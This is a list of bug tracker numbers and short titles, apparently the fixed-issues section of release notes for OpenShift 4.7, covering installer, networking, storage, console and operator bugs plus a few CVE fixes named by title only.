1880787 - No description for Provisioning CRD for `oc explain`
1880902 - need dnsPlocy set in crd ingresscontrollers
1880913 - [DeScheduler] - change loglevel from Info to Error when priority class given in the descheduler params is not present in the cluster
1881027 - Cluster installation fails at with error : the container name \"assisted-installer\" is already in use
1881046 - [OSP] openstack-cinder-csi-driver-operator doesn't contain required manifests and assets
1881155 - operator install authentication: Authentication require functional ingress which requires at least one schedulable and ready node
1881268 - Image uploading failed but wizard claim the source is available
1881322 - kube-scheduler not scheduling pods for certificates not renewed automatically after nodes restoration
1881347 - [v2v][ui]VM Import Wizard does not call Import provider cleanup
1881881 - unable to specify target port manually resulting in application not reachable
1881898 - misalignment of sub-title in quick start headers
1882022 - [vsphere][ipi] directory path is incomplete, terraform can't find the cluster
1882057 - Not able to select access modes for snapshot and clone
1882140 - No description for spec.kubeletConfig
1882176 - Master recovery instructions don't handle IP change well
1882191 - Installation fails against external resources which lack DNS Subject Alternative Name
1882209 - [ BateMetal IPI ] local coredns resolution not working
1882210 - [release 4.7] insights-operator: Fix bug in reflector not recovering from "Too large resource version"
1882268 - [e2e][automation]Add Integration Test for Snapshots
1882361 - Retrieve and expose the latest report for the cluster
1882485 - dns-node-resolver corrupts /etc/hosts if internal registry is not in use
1882556 - git:// protocol in origin tests is not currently proxied
1882569 - CNO: Replacing masters doesn't work for ovn-kubernetes 4.4
1882608 - Spot instance not getting created on AzureGovCloud
1882630 - Fstype is changed after deleting pv provisioned by localvolumeset instance
1882649 - IPI installer labels all images it uploads into glance as qcow2
1882653 - The Approval should display the Manual after the APPROVAL changed to Manual from the Automatic
1882658 - [RFE] Volume Snapshot is not listed under inventory in Project Details page
1882660 - Operators in a namespace should be installed together when approve one
1882667 - [ovn] br-ex Link not found when scale up RHEL worker
1882723 - [vsphere]Suggested mimimum value for providerspec not working
1882730 - z systems not reporting correct core count in recording rule
1882750 - [sig-api-machinery][Feature:APIServer][Late] kubelet terminates kube-apiserver gracefully
1882781 - nameserver= option to dracut creates extra NM connection profile
1882785 - Multi-Arch CI Jobs destroy libvirt network but occasionally leave it defined
1882844 - [IPI on vsphere] Executing 'openshift-installer destroy cluster' leaves installer tag categories in vsphere
1883371 - CVE-2020-26160 jwt-go: access restriction bypass vulnerability
1883388 - Bare Metal Hosts Details page doesn't show Mainitenance and Power On/Off status
1883422 - operator-sdk cleanup fail after installing operator with "run bundle" without installmode and og with ownnamespace
1883425 - Gather top installplans and their count
1883502 - Logging is broken due to mix of k8s.io/klog v1 and v2
1883523 - [sig-cli] oc adm must-gather runs successfully for audit logs [Suite:openshift/conformance/parallel]
1883538 - must gather report "cannot file manila/aws ebs/ovirt csi related namespaces and objects" error
1883560 - operator-registry image needs clean up in /tmp
1883563 - Creating duplicate namespace from create namespace modal breaks the UI
1883614 - [OCP 4.6] [UI] UI should not describe power cycle as "graceful"
1883642 - [sig-imageregistry][Feature:ImageTriggers][Serial] ImageStream admission TestImageStreamAdmitSpecUpdate
1883660 - e2e-metal-ipi CI job consistently failing on 4.4
1883765 - [user workload monitoring] improve latency of Thanos sidecar when streaming read requests
1883766 - [e2e][automation] Adjust tests for UI changes
1883768 - [user workload monitoring] The Prometheus operator should discard invalid TLS configurations
1883773 - opm alpha bundle build fails on win10 home
1883790 - revert "force cert rotation every couple days for development" in 4.7
1883803 - node pull secret feature is not working as expected
1883836 - Jenkins imagestream ubi8 and nodejs12 update
1883847 - The UI does not show checkbox for enable encryption at rest for OCS
1883853 - go list -m all does not work
1883905 - race condition in opm index add --overwrite-latest
1883946 - Understand why trident CSI pods are getting deleted by OCP
1884035 - Pods are illegally transitioning back to pending
1884041 - e2e should provide error info when minimum number of pods aren't ready in kube-system namespace
1884131 - oauth-proxy repository should run tests
1884165 - Repos should be disabled in -firstboot.service before OS extensions are applied
1884221 - IO becomes unhealthy due to a file change
1884258 - Node network alerts should work on ratio rather than absolute values
1884270 - Git clone does not support SCP-style ssh locations
1884334 - CVO marks an upgrade as failed when an operator takes more than 20 minutes to rollout
1884435 - vsphere - loopback is randomly not being added to resolver
1884565 - oauth-proxy crashes on invalid usage
1884584 - Kuryr controller continuously restarting due to unable to clean up Network Policy
1884613 - Create Instance of Prometheus from operator returns blank page for non cluster-admin users
1884628 - ovs-configuration service fails when the external network is configured on a tagged vlan on top of a bond device on a baremetal IPI deployment
1884629 - Visusally impaired user using screen reader not able to select Admin/Developer console options in drop down menu.
1884632 - Adding BYOK disk encryption through DES
1884654 - Utilization of a VMI is not populated
1884655 - KeyError on self._existing_vifs[port_id]
1884664 - Operator install page shows "installing..." instead of going to install status page
1884672 - Failed to inspect hardware. Reason: unable to start inspection: 'idrac'
1884691 - Installer blocks cloud-credential-operator manual mode on GCP and Azure
1884724 - Quick Start: Serverless quickstart doesn't match Operator install steps
1884739 - Node process segfaulted
1884824 - Update baremetal-operator libraries to k8s 1.19
1885002 - network kube-rbac-proxy scripts crashloop rather than non-crash looping
1885138 - Wrong detection of pending state in VM details
1885151 - [Cloud Team - Cluster API Provider Azure] Logging is broken due to mix of k8s.io/klog v1 and v2
1885165 - NoRunningOvnMaster alert falsely triggered
1885170 - Nil pointer when verifying images
1885173 - [e2e][automation] Add test for next run configuration feature
1885179 - oc image append fails on push (uploading a new layer)
1885213 - Vertical Pod Autoscaler (VPA) not working with DeploymentConfig
1885218 - [e2e][automation] Add virtctl to gating script
1885223 - Sync with upstream (fix panicking cluster-capacity binary)
1885235 - Prometheus: Logging is broken due to mix of k8s.io/klog v1 and v2
1885241 - kube-rbac-proxy: Logging is broken due to mix of k8s.io/klog v1 and v2
1885243 - prometheus-adapter: Logging is broken due to mix of k8s.io/klog v1 and v2
1885244 - prometheus-operator: Logging is broken due to mix of k8s.io/klog v1 and v2
1885246 - cluster-monitoring-operator: Logging is broken due to mix of k8s.io/klog v1 and v2
1885249 - openshift-state-metrics: Logging is broken due to mix of k8s.io/klog v1 and v2
1885308 - Supermicro nodes failed to boot via disk during installation when using IPMI and UEFI
1885315 - unit tests fail on slow disks
1885319 - Remove redundant use of group and kind of DataVolumeTemplate
1885343 - Console doesn't load in iOS Safari when using self-signed certificates
1885344 - 4.7 upgrade - dummy bug for 1880591
1885358 - add p&f configuration to protect openshift traffic
1885365 - MCO does not respect the install section of systemd files when enabling
1885376 - failed to initialize the cluster: Cluster operator marketplace is still updating
1885398 - CSV with only Webhook conversion can't be installed
1885403 - Some OLM events hide the underlying errors
1885414 - Need to disable HTX when not using HTTP/2 in order to preserve HTTP header name case
1885425 - opm index add cannot batch add multiple bundles that use skips
1885543 - node tuning operator builds and installs an unsigned RPM
1885644 - Panic output due to timeouts in openshift-apiserver
1885676 - [OCP 4.7]UI should fallback to minimal deployment only after total CPU < 30 || totalMemory < 72 GiB for initial deployment
1885702 - Cypress: Fix 'aria-hidden-focus' accesibility violations
1885706 - Cypress: Fix 'link-name' accesibility violation
1885761 - DNS fails to resolve in some pods
1885856 - Missing registry v1 protocol usage metric on telemetry
1885864 - Stalld service crashed under the worker node
1885930 - [release 4.7] Collect ServiceAccount statistics
1885940 - kuryr/demo image ping not working
1886007 - upgrade test with service type load balancer will never work
1886022 - Move range allocations to CRD's
1886028 - [BM][IPI] Failed to delete node after scale down
1886111 - UpdatingopenshiftStateMetricsFailed: DeploymentRollout of openshift-monitoring/openshift-state-metrics: got 1 unavailable replicas
1886134 - Need to set GODEBUG=x509ignoreCN=0 in initrd
1886154 - System roles are not present while trying to create new role binding through web console
1886166 - 1885517 Clone - Not needed for 4.7 - upgrade from 4.5->4.6 causes broadcast storm
1886168 - Remove Terminal Option for Windows Nodes
1886200 - greenwave / CVP is failing on bundle validations, cannot stage push
1886229 - Multipath support for RHCOS sysroot
1886294 - Unable to schedule a pod due to Insufficient ephemeral-storage
1886327 - Attempt to add a worker using bad roodDeviceHint: bmh and machine become Provisioned, no error in status
1886353 - [e2e][automation] kubevirt-gating job fails for a missing virtctl URL
1886397 - Move object-enum to console-shared
1886423 - New Affinities don't contain ID until saving
1886435 - Azure UPI uses deprecated command 'group deployment'
1886449 - p&f: add configuration to protect oauth server traffic
1886452 - layout options doesn't gets selected style on click i.e grey background
1886462 - IO doesn't recognize namespaces - 2 resources with the same name in 2 namespaces -> only 1 gets collected
1886488 - move e2e test off of nfs image from docker.io/gmontero/nfs-server:latest
1886524 - Change default terminal command for Windows Pods
1886553 - i/o timeout experienced from build02 when targeting CI test cluster during test execution
1886600 - panic: assignment to entry in nil map
1886620 - Application behind service load balancer with PDB is not disrupted
1886627 - Kube-apiserver pods restarting/reinitializing periodically
1886635 - CVE-2020-8563 kubernetes: Secret leaks in kube-controller-manager when using vSphere Provider
1886636 - Panic in machine-config-operator
1886749 - Removing network policy from namespace causes inability to access pods through loadbalancer.
1886751 - Gather MachineConfigPools
1886766 - PVC dropdown has 'Persistent Volume' Label
1886834 - ovn-cert is mandatory in both master and node daemonsets
1886848 - [OSP] machine instance-state annotation discrepancy with providerStatus.instanceState
1886861 - ordered-values.yaml not honored if values.schema.json provided
1886871 - Neutron ports created for hostNetworking pods
1886890 - Overwrite jenkins-agent-base imagestream
1886900 - Cluster-version operator fills logs with "Manifest: ..." spew
1886922 - [sig-network] pods should successfully create sandboxes by getting pod
1886973 - Local storage operator doesn't include correctly populate LocalVolumeDiscoveryResult in console
1886977 - [v2v]Incorrect VM Provider type displayed in UI while importing VMs through VMIO
1887010 - Imagepruner met error "Job has reached the specified backoff limit" which causes image registry degraded
1887026 - FC volume attach fails with “no fc disk found” error on OCP 4.6 PowerVM cluster
1887040 - [upgrade] ovs pod crash for rhel worker when upgarde from 4.5 to 4.6
1887046 - Event for LSO need update to avoid confusion
1887088 - cluster-node-tuning-operator refers to missing cluster-node-tuned image
1887375 - User should be able to specify volumeMode when creating pvc from web-console
1887380 - Unsupported access mode should not be available to select when creating pvc by aws-ebs-csi-driver(gp2-csi) from web-console
1887392 - openshift-apiserver: delegated authn/z should have ttl > metrics/healthz/readyz/openapi interval
1887428 - oauth-apiserver service should be monitored by prometheus
1887441 - ingress misconfiguration may break authentication but ingress operator keeps reporting "degraded: False"
1887454 - [sig-storage] In-tree Volumes [Driver: azure-disk] [Testpattern: Dynamic PV (ext4)] volumes should store data
1887456 - It is impossible to attach the default NIC to a bridge with the latest version of OVN Kubernetes
1887465 - Deleted project is still referenced
1887472 - unable to edit application group for KSVC via gestures (shift+Drag)
1887488 - OCP 4.6: Topology Manager OpenShift E2E test fails: gu workload attached to SRIOV networks should let resource-aligned PODs have working SRIOV network interface
1887509 - Openshift-tests conformance TopologyManager tests run when Machine Config Operator is not installed on cluster
1887525 - Failures to set master HardwareDetails cannot easily be debugged
1887545 - 4.5 to 4.6 upgrade fails when external network is configured on a bond device: ovs-configuration service fails and node becomes unreachable
1887585 - ovn-masters stuck in crashloop after scale test
1887651 - [Internal Mode] Object gateway (RGW) in unknown state after OCP upgrade.
1887737 - Test TestImageRegistryRemovedWithImages is failing on e2e-vsphere-operator
1887740 - cannot install descheduler operator after uninstalling it
1887745 - API server is throwing 5xx error code for 42.11% of requests for LIST events
1887750 - `oc explain localvolumediscovery` returns empty description
1887751 - `oc explain localvolumediscoveryresult` returns empty description
1887778 - Add ContainerRuntimeConfig gatherer
1887783 - PVC upload cannot continue after approve the certificate
1887797 - [CNV][V2V] Default network type is bridge for interface bound to POD network in VMWare migration wizard
1887799 - User workload monitoring prometheus-config-reloader OOM
1887850 - [sig-auth][Feature:SCC][Early] should not have pod creation failures during install test is flaky
1887863 - Installer panics on invalid flavor
1887864 - Clean up dependencies to avoid invalid scan flagging
1887934 - TestForwardedHeaderPolicyAppend, TestForwardedHeaderPolicyReplace, and TestForwardedHeaderPolicyIfNone consistently fail because of case-sensitive comparison
1887936 - Kube-scheduler should be able to parse v1beta1 KubeSchedulerConfig
1888015 - workaround kubelet graceful termination of static pods bug
1888028 - prevent extra cycle in aggregated apiservers
1888036 - Operator details shows old CRD versions
1888041 - non-terminating pods are going from running to pending
1888072 - Setting Supermicro node to PXE boot via Redfish doesn't take affect
1888073 - Operator controller continuously busy looping
1888118 - Memory requests not specified for image registry operator
1888150 - Install Operand Form on OperatorHub is displaying unformatted text
1888172 - PR 209 didn't update the sample archive, but machineset and pdbs are now namespaced
1888227 - Failed to deploy some of container image on the recent OCP 4.6 nightly build
1888292 - Fix CVE-2015-7501 affecting agent-maven-3.5
1888311 - p&f: make SAR traffic from oauth and openshift apiserver exempt
1888363 - namespaces crash in dev
1888378 - [IPI on Azure] errors destroying cluster when Azure resource group was never created
1888381 - instance:node_network_receive_bytes_excluding_lo:rate1m value twice expected
1888464 - installer missing permission definitions for TagResources and UntagResources when installing in existing VPC
1888494 - imagepruner pod is error when image registry storage is not configured
1888565 - [OSP] machine-config-daemon-firstboot.service failed with "error reading osImageURL from rpm-ostree"
1888595 - cluster-policy-controller logs shows error which reads initial monitor sync has error
1888601 - The poddisruptionbudgets is using the operator service account, instead of gather
1888657 - oc doesn't know its name
1888663 - sdn starts after kube-apiserver, delay readyz until oauth-apiserver is reachable
1888671 - Document the Cloud Provider's ignore-volume-az setting
1888738 - quay.io/openshift/origin-must-gather:latest is not a multi-arch, manifest-list image
1888763 - at least one of these parameters (Vendor, DeviceID or PfNames) has to be defined in nicSelector in CR %s", cr.GetName()
1888827 - ovnkube-master may segfault when trying to add IPs to a nil address set
1888861 - need to pass dual-stack service CIDRs to kube-apiserver in dual-stack cluster
1888866 - AggregatedAPIDown permanently firing after removing APIService
1888870 - JS error when using autocomplete in YAML editor
1888874 - hover message are not shown for some properties
1888900 - align plugins versions
1888985 - Cypress: Fix 'Ensures buttons have discernible text' accesibility violation
1889213 - The error message of uploading failure is not clear enough
1889267 - Increase the time out for creating template and upload image in the terraform
1889348 - Project link should be removed from Application Details page, since it is inaccurate (Application Stages)
1889374 - Kiali feature won't work on fresh 4.6 cluster
1889388 - ListBundles returns incorrect replaces/skips when bundles have been added via semver-skippatch mode
1889420 - OCP failed to add vsphere disk when pod moved to new node during cluster upgrade
1889515 - Accessibility - The symbols e.g checkmark in the Node > overview page has no text description, label, or other accessible information
1889529 - [Init-CR annotation] Inline alert shows operand instance was needed still appearing after creating an Operand instance
1889540 - [4.5 upgrade][alert]CloudCredentialOperatorDown
1889577 - Resources are not shown on project workloads page
1889620 - [Azure] - Machineset not scaling when publicIP:true in disconnected Azure enviroment
1889630 - Scheduling disabled popovers are missing for Node status in Node Overview and Details pages
1889692 - Selected Capacity is showing wrong size
1889694 - usbguard fails to install as RHCOS extension due to missing libprotobuf.so.15
1889698 - When the user clicked cancel at the Create Storage Class confirmation dialog all the data from the Local volume set goes off
1889710 - Prometheus metrics on disk take more space compared to OCP 4.5
1889721 - opm index add semver-skippatch mode does not respect prerelease versions
1889724 - When LocalVolumeDiscovery CR is created form the LSO page User doesn't see the Disk tab
1889767 - [vsphere] Remove certificate from upi-installer image
1889779 - error when destroying a vSphere installation that failed early
1889787 - OCP is flooding the oVirt engine with auth errors
1889838 - race in Operator update after fix from bz1888073
1889852 - support new AWS regions ap-east-1, af-south-1, eu-south-1
1889863 - Router prints incorrect log message for namespace label selector
1889891 - Backport timecache LRU fix
1889912 - Drains can cause high CPU usage
1889921 - Reported Degraded=False Available=False pair does not make sense
1889928 - [e2e][automation] Add more tests for golden os
1889943 - EgressNetworkPolicy does not work when setting Allow rule to a dnsName
1890038 - Infrastructure status.platform not migrated to status.platformStatus causes warnings
1890074 - MCO extension kernel-headers is invalid
1890104 - with Serverless 1.10 version of trigger/subscription/channel/IMC is V1 as latest
1890130 - multitenant mode consistently fails CI
1890141 - move off docker.io images for build/image-eco/templates/jenkins e2e
1890145 - The mismatched of font size for Status Ready and Health Check secondary text
1890180 - FieldDependency x-descriptor doesn't support non-sibling fields
1890182 - DaemonSet with existing owner garbage collected
1890228 - AWS: destroy stuck on route53 hosted zone not found
1890235 - e2e: update Protractor's checkErrors logging
1890250 - workers may fail to join the cluster during an update from 4.5
1890256 - Replacing a master node on a baremetal IPI deployment gets stuck when deleting the machine of the unhealthy member
1890270 - External IP doesn't work if the IP address is not assigned to a node
1890361 - s390x: Generate new ostree rpm with fix for rootfs immutability
1890456 - [vsphere] mapi_instance_create_failed doesn't work on vsphere
1890467 - unable to edit an application without a service
1890472 - [Kuryr] Bulk port creation exception not completely formatted
1890494 - Error assigning Egress IP on GCP
1890530 - cluster-policy-controller doesn't gracefully terminate
1890630 - [Kuryr] Available port count not correctly calculated for alerts
1890671 - [SA] verify-image-signature using service account does not work
1890677 - 'oc image info' claims 'does not exist' for application/vnd.oci.image.manifest.v1+json manifest
1890808 - New etcd alerts need to be added to the monitoring stack
1890951 - Mirror of multiarch images together with cluster logging case problems. It doesn't sync the "overall" sha it syncs only the sub arch sha.
1890984 - Rename operator-webhook-config to sriov-operator-webhook-config
1890995 - wew-app should provide more insight into why image deployment failed
1891023 - ovn-kubernetes rbac proxy never starts waiting for an incorrect API call
1891047 - Helm chart fails to install using developer console because of TLS certificate error
1891068 - [sig-instrumentation] Prometheus when installed on the cluster shouldn't report any alerts in firing state apart from Watchdog and AlertmanagerReceiversNotConfigured [Early] failing due to TargetDown alert from kube-scheduler
1891080 - [LSO] When Localvolumeset and SC is already created before OCS install Creation of LVD and LVS is skipped when user click created storage cluster from UI
1891108 - p&f: Increase the concurrency share of workload-low priority level
1891143 - CVO deadlocked while shutting down, shortly after fresh cluster install (metrics goroutine)
1891189 - [LSO] max device limit is accepting negative values. PVC is not getting created and no error is shown
1891314 - Display incompatible helm charts for installation (kubeVersion of cluster doesn't meet requirements of chart)
1891362 - Wrong metrics count for openshift_build_result_total
1891368 - fync should be fsync for etcdHighFsyncDurations alert's annotations.message
1891374 - fync should be fsync for etcdHighFsyncDurations critical alert's annotations.message
1891376 - Extra text in Cluster Utilization charts
1891419 - Wrong detail head on network policy detail page.
1891459 - Snapshot tests should report stderr of failed commands
1891498 - Other machine config pools do not show during update
1891543 - OpenShift 4.6/OSP install fails when node flavor has less than 25GB, even with dedicated storage
1891551 - Clusterautoscaler doesn't scale up as expected
1891552 - Handle missing labels as empty.
1891555 - The windows oc.exe binary does not have version metadata
1891559 - kuryr-cni cannot start new thread
1891614 - [mlx] testpmd fails inside OpenShift pod using DevX version 19.11
1891625 - [Release 4.7] Mutable LoadBalancer Scope
1891702 - installer get pending when additionalTrustBundle is added into install-config.yaml
1891716 - OVN cluster upgrade from 4.6.1 to 4.7 fails
1891740 - OperatorStatusChanged is noisy
1891758 - the authentication operator may spam DeploymentUpdated event endlessly
1891759 - Dockerfile builds cannot change /etc/pki/ca-trust
1891816 - [UPI] [OSP] control-plane.yml provisioning playbook fails on OSP 16.1
1891825 - Error message not very informative in case of mode mismatch
1891898 - The ClusterServiceVersion can define Webhooks that cannot be created.
1891951 - UI should show warning while creating pools with compression on
1891952 - [Release 4.7] Apps Domain Enhancement
1891993 - 4.5 to 4.6 upgrade doesn't remove deployments created by marketplace
1891995 - OperatorHub displaying old content
1891999 - Storage efficiency card showing wrong compression ratio
1892004 - OCP 4.6 opm on Ubuntu 18.04.4 - error /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.28' not found (required by ./opm)
1892167 - [SR-IOV] SriovNetworkNodePolicies apply ignoring the spec.nodeSelector.
1892198 - TypeError in 'Performance Profile' tab displayed for 'Performance Addon Operator'
1892288 - assisted install workflow creates excessive control-plane disruption
1892338 - HAProxyReloadFail alert only briefly fires in the event of a broken HAProxy config
1892358 - [e2e][automation] update feature gate for kubevirt-gating job
1892376 - Deleted netnamespace could not be re-created
1892390 - TestOverwrite/OverwriteBundle/DefaultBehavior in operator-registry is flaky
1892393 - TestListPackages is flaky
1892448 - MCDPivotError alert/metric missing
1892457 - NTO-shipped stalld needs to use FIFO for boosting.
1892467 - linuxptp-daemon crash
1892521 - [AWS] Startup bootstrap machine failed due to ignition file is missing in disconnected UPI env
1892653 - User is unable to create KafkaSource with v1beta
1892724 - VFS added to the list of devices of the nodeptpdevice CRD
1892799 - Mounting additionalTrustBundle in the operator
1893117 - Maintenance mode on vSphere blocks installation.
1893351 - TLS secrets are not able to edit on console.
1893362 - The ovs-xxxxx_openshift-sdn container does not terminate gracefully, slowing down reboots
1893386 - false-positive ReadyIngressNodes_NoReadyIngressNodes: Auth operator makes risky "worker" assumption when guessing about ingress availability
1893546 - Deploy using virtual media fails on node cleaning step
1893601 - overview filesystem utilization of OCP is showing the wrong values
1893645 - oc describe route SIGSEGV
1893648 - Ironic image building process is not compatible with UEFI secure boot
1893724 - OperatorHub generates incorrect RBAC
1893739 - Force deletion doesn't work for snapshots if snapshotclass is already deleted
1893776 - No useful metrics for image pull time available, making debugging issues there impossible
1893798 - Lots of error messages starting with "get namespace to enqueue Alertmanager instances failed" in the logs of prometheus-operator
1893832 - ErrorCount field is missing in baremetalhosts.metal3.io CRD
1893889 - disabled dropdown items in the pf dropdown component are skipped over and unannounced by JAWS
1893926 - Some "Dynamic PV (block volmode)" pattern storage e2e tests are wrongly skipped
1893944 - Wrong product name for Multicloud Object Gateway
1893953 - (release-4.7) Gather default StatefulSet configs
1893956 - Installation always fails at "failed to initialize the cluster: Cluster operator image-registry is still updating"
1893963 - [Testday] Workloads-> Virtualization is not loading for Firefox browser
1893972 - Should skip e2e test cases as early as possible
1894013 - [v2v][Testday] VMware to CNV VM import]VMware URL: It is not clear that only the FQDN/IP address is required without 'https://'
1894020 - User with edit users cannot deploy images from their own namespace from the developer perspective
1894025 - OCP 4.5 to 4.6 upgrade for "aws-ebs-csi-driver-operator" fails when "defaultNodeSelector" is set
1894041 - [v2v][[Testday]VM import from VMware/RHV] VM import wizard: The target storage class name is not displayed if default storage class is used.
1894065 - tag new packages to enable TLS support
1894110 - Console shows wrong value for maxUnavailable and maxSurge when set to 0
1894144 - CI runs of baremetal IPI are failing due to newer libvirt libraries
1894146 - ironic-api used by metal3 is over provisioned and consumes a lot of RAM
1894194 - KuryrPorts leftovers from 4.6 GA need to be deleted
1894210 - Failed to encrypt OSDs on OCS4.6 installation (via UI)
1894216 - Improve OpenShift Web Console availability
1894275 - Fix CRO owners file to reflect node owner
1894278 - "database is locked" error when adding bundle to index image
1894330 - upgrade channels needs to be updated for 4.7
1894342 - oauth-apiserver logs many "[SHOULD NOT HAPPEN] failed to update managedFields for ... OAuthClient ... no corresponding type for oauth.openshift.io/v1, Kind=OAuthClient"
1894374 - Dont prevent the user from uploading a file with incorrect extension
1894432 - [oVirt] sometimes installer timeout on tmp_import_vm
1894477 - bash syntax error in nodeip-configuration.service
1894503 - add automated test for Polarion CNV-5045
1894519 - [OSP] External mode cluster creation disabled for Openstack and oVirt platform
1894539 - [on-prem] Unable to deploy additional machinesets on separate subnets
1894645 - Cinder volume provisioning crashes on nil cloud provider
1894677 - image-pruner job is panicking: klog stack
1894810 - Remove TechPreview Badge from Eventing in Serverless version 1.11.0
1894860 - 'backend' CI job passing despite failing tests
1894910 - Update the node to use the real-time kernel fails
1894992 - All nightly jobs for e2e-metal-ipi failing due to ipa image missing tenacity package
1895065 - Schema / Samples / Snippets Tabs are all selected at the same time
1895099 - vsphere-upi and vsphere-upi-serial jobs time out waiting for bootstrap to complete in CI
1895141 - panic in service-ca injector
1895147 - Remove memory limits on openshift-dns
1895169 - VM Template does not properly manage Mount Windows guest tools check box during VM creation
1895268 - The bundleAPIs should NOT be empty
1895309 - [OCP v47] The RHEL node scaleup fails due to "No package matching 'cri-o-1.19.*' found available" on OCP 4.7 cluster
1895329 - The infra index filled with warnings "WARNING: kubernetes.io/cinder built-in volume provider is now deprecated. The Cinder volume provider is deprecated and will be removed in a future release"
1895360 - Machine Config Daemon removes a file although its defined in the dropin
1895367 - Missing image in metadata DB index.db in disconnected Operator Hub installation. OCP 4.6.1
1895372 - Web console going blank after selecting any operator to install from OperatorHub
1895385 - Revert KUBELET_LOG_LEVEL back to level 3
1895423 - unable to edit an application with a custom builder image
1895430 - unable to edit custom template application
1895509 - Backup taken on one master cannot be restored on other masters
1895537 - [sig-imageregistry][Feature:ImageExtract] Image extract should extract content from an image
1895838 - oc explain description contains '/'
1895908 - "virtio" option is not available when modifying a CD-ROM to disk type
1895909 - e2e-metal-ipi-ovn-dualstack is failing
1895919 - NTO fails to load kernel modules
1895959 - configuring webhook token authentication should prevent cluster upgrades
1895979 - Unable to get coreos-installer with --copy-network to work
1896101 - [cnv][automation] Added negative tests for migration from VMWare and RHV
1896160 - CI: Some cluster operators are not ready: marketplace (missing: Degraded)
1896188 - [sig-cli] oc debug deployment configs from a build: local-busybox-1-build not completed
1896218 - Occasional GCP install failures: Error setting IAM policy for project ...: googleapi: Error 400: Service account ... does not exist., badRequest
1896229 - Current Rate of Bytes Received and Current Rate of Bytes Transmitted data can not be loaded
1896244 - Found a panic in storage e2e test
1896296 - Git links should avoid .git as part of the URL and should not link git:// urls in general
1896302 - [e2e][automation] Fix 4.6 test failures
1896365 - [Migration]The SDN migration cannot revert under some conditions
1896384 - [ovirt IPI]: local coredns resolution not working
1896446 - Git clone from private repository fails after upgrade OCP 4.5 to 4.6
1896529 - Incorrect instructions in the Serverless operator and application quick starts
1896645 - documentationBaseURL needs to be updated for 4.7
1896697 - [Descheduler] policy.yaml param in cluster configmap is empty
1896704 - Machine API components should honour cluster wide proxy settings
1896732 - "Attach to Virtual Machine OS" button should not be visible on old clusters
1896866 - File /etc/NetworkManager/system-connections/default_connection.nmconnection is incompatible with SR-IOV operator
1896898 - ovs-configuration.service fails when multiple IPv6 default routes are provided via RAs over the same interface and deployment bootstrap fails
1896918 - start creating new-style Secrets for AWS
1896923 - DNS pod /metrics exposed on anonymous http port
1896977 - route SimpleAllocationPlugin: host name validation errors: spec.host: Invalid value: ... must be no more than 63 characters
1897003 - VNC console cannot be connected after visit it in new window
1897008 - Cypress: reenable check for 'aria-hidden-focus' rule & checkA11y test for modals
1897026 - [Migration] With updating optional network operator configuration, migration stucks on MCO
1897039 - router pod keeps printing log: template "msg"="router reloaded" "output"="[WARNING] 316/065823 (15) : parsing [/var/lib/haproxy/conf/haproxy.config:52]: option 'http-use-htx' is deprecated and ignored
1897050 - [IBM Power] LocalVolumeSet provisions boot partition as PV.
1897073 - [OCP 4.5] wrong netid assigned to Openshift projects/namespaces
1897138 - oVirt provider uses depricated cluster-api project
1897142 - When scaling replicas to zero, Octavia loadbalancer pool members are not updated accordingly
1897252 - Firing alerts are not showing up in console UI after cluster is up for some time
1897354 - Operator installation showing success, but Provided APIs are missing
1897361 - The MCO GCP-OP tests fail consistently on containerruntime tests with "connection refused"
1897412 - [sriov]disableDrain did not be updated in CRD of manifest
1897423 - Max unavailable and Max surge value are not shown on Deployment Config Details page
1897516 - Baremetal IPI deployment with IPv6 control plane fails when the nodes obtain both SLAAC and DHCPv6 addresses as they set their hostname to 'localhost'
1897520 - After restarting nodes the image-registry co is in degraded true state.
1897584 - Add casc plugins
1897603 - Cinder volume attachment detection failure in Kubelet
1897604 - Machine API deployment fails: Kube-Controller-Manager can't reach API: "Unauthorized"
1897635 - CVE-2020-28362 golang: math/big: panic during recursive division of very large numbers
1897641 - Baremetal IPI with IPv6 control plane: nodes respond with duplicate packets to ICMP6 echo requests
1897676 - [CI] [Azure] [UPI] CI failing since 4.6 changes in ignition
1897830 - [GSS] Unable to deploy OCS 4.5.2 on OCP 4.6.1, cannot `Create OCS Cluster Service`
1897891 - [RFE][v2v][UI][CNV VM import] Providing error message or/and block migration when vddk-init-image is missing
1897897 - ptp lose sync openshift 4.6
1898036 - no network after reboot (IPI)
1898045 - AWS EBS CSI Driver can not get updated cloud credential secret automatically
1898097 - mDNS floods the baremetal network
1898118 - Lack of logs on some image stream tests make hard to find root cause of a problem
1898134 - Descheduler logs show absolute values instead of percentage when LowNodeUtilization strategy is applied
1898159 - kcm operator shall pass --allocate-node-cidrs=false to kcm for ovn-kube and openshift-sdn cluster
1898174 - [OVN] EgressIP does not guard against node IP assignment
1898194 - GCP: can't install on custom machine types
1898238 - Installer validations allow same floating IP for API and Ingress
1898268 - [OVN]: `make check` broken on 4.6
1898289 - E2E test: Use KUBEADM_PASSWORD_FILE by default
1898320 - Incorrect Apostrophe Translation of "it's" in Scheduling Disabled Popover
1898357 - Within the operatorhub details view, long unbroken text strings do not wrap cause breaking display.
1898407 - [Deployment timing regression] Deployment takes longer with 4.7
1898417 - GCP: the dns targets in Google Cloud DNS is not updated after recreating loadbalancer service
1898487 - [oVirt] Node is not removed when VM has been removed from oVirt engine
1898500 - Failure to upgrade operator when a Service is included in a Bundle
1898517 - Ironic auto-discovery may result in rogue nodes registered in ironic
1898532 - Display names defined in specDescriptors not respected
1898580 - When adding more than one node selector to the sriovnetworknodepolicy, the cni and the device plugin pods are constantly rebooted
1898613 - Whereabouts should exclude IPv6 ranges
1898655 - [oVirt] Node deleted in oVirt should cause the Machine to go into a Failed phase
1898679 - Operand creation form - Required "type: object" properties (Accordion component) are missing red asterisk
1898680 - CVE-2020-7774 nodejs-y18n: prototype pollution vulnerability
1898745 - installation failing with CVO reporting openshift-samples not rolled out, samples not setting versions in its ClusterOperator
1898839 - Wrong YAML in operator metadata
1898851 - Multiple Pods access the same volume on the same node e2e test cases are missed from aws ebs csi driver e2e test job
1898873 - Remove TechPreview Badge from Monitoring
1898954 - Backup script does not take /etc/kubernetes/static-pod-resources on a reliable way
1899111 - [RFE] Update jenkins-maven-agen to maven36
1899128 - VMI details screen -> show the warning that it is preferable to have a VM only if the VM actually does not exist
1899175 - bump the RHCOS boot images for 4.7
1899198 - Use new packages for ipa ramdisks
1899200 - In Installed Operators page I cannot search for an Operator by it's name
1899220 - Support AWS IMDSv2
1899350 - configure-ovs.sh doesn't configure bonding options
1899433 - When Creating OCS from ocs wizard Step Discover Disks shows Error "An error occurred Not Found"
1899459 - Failed to start monitoring pods once the operator removed from override list of CVO
